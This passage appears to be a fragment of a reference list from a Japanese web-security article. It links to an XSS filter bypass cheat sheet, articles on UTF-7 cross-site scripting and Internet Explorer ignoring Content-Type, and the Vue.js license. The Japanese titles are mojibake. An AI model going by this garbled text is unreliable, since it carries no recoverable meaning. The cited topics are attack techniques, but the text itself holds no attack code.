 https://github.com/masatokinugawa/filterbypass/wiki/Browser%27s-XSS-Filter-Bypass-Cheat- Sheet (5) UTF-7ʹΑΔΫϩεαΠτεΫϦϓςΟϯά߈ܸ
 http://gihyo.jp/admin/serial/01/charcode/0001 (6)ʦແࢹͰ͖ͳ͍ʧIEͷContent-Typeແࢹ
 http://www.atmarkit.co.jp/ait/articles/0903/30/news118.html (7) Vue.js: Copyright (c) 2013-present, Yuxi (Evan) You
 Released under the MIT license 
 https://raw.githubusercontent.com/vuejs/vue/dev/LICENSE